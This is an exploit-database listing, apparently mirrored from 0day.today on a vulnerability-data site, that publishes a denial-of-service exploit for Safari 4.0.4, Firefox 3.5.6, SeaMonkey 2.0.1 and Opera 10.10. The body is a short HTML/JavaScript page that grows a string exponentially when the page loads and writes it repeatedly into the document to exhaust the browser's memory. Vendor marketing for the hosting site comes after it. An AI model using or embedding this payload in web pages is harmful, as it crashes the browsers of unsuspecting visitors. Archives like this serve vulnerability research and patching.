Lucene search
+L

Safari v4.0.4, Firefox v3.5.6, SeaMonkey v2.0.1, Opera v10.10 DoS Exploit

🗓️ 07 Feb 2010 00:00:00Reported by 599eme ManType 
zdt
 zdt
🔗 0day.today👁 27 Views

Safari, Firefox, SeaMonkey, Opera DoS Exploi

Code
=========================================================================
Safari v4.0.4, Firefox v3.5.6, SeaMonkey v2.0.1, Opera v10.10 DoS Exploit
=========================================================================

<!--
Safari 4.0.4 Remote Denial of Service (With Possible Memory Corruption With OOM)
 
Firefox 3.5.6
Safari 4.0.4
SeaMonkey 2.0.1
Opera  10.10

-->
 
<body onload="javascript:DoS();"></body>
 
<script>
 
function DoS() {
 
var buffer = 'A';
for (i =0;i<150;i++) {
buffer+=buffer+'A';
document.write('<html><marquee><h1>'+buffer+buffer);
}
 
}
 
</script>



#  0day.today [2018-04-14]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation